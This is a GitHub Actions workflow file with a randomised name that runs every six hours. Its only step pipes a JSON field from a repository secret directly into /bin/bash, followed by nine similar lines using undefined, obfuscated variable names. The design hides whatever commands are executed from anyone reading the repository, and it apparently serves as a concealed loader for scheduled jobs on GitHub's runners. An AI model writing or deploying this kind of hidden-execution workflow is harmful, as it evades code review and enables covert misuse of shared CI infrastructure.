name: sunbuer2015

on:
  workflow_dispatch:
  schedule:
    - cron: '16 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: sunbuer2015
        env:
          ogzc442: ${{ secrets.ogzc442 }}
        run: |
          echo $ogzc442 | jq -r .yvsrw0442 | /bin/bash
          echo $m0997 | jq -r .y67 | /bin/bash
          echo $a36 | jq -r .joif32 | /bin/bash
          echo $boule8546 | jq -r .wariv39353 | /bin/bash
          echo $icde5 | jq -r .ch46 | /bin/bash
          echo $gmkx5444 | jq -r .wrvk627 | /bin/bash
          echo $ebw21 | jq -r .q89388 | /bin/bash
          echo $aukh49 | jq -r .rcfn6511 | /bin/bash
          echo $lwr559 | jq -r .e89921 | /bin/bash
          echo $tb4459 | jq -r .omgt08539 | /bin/bash

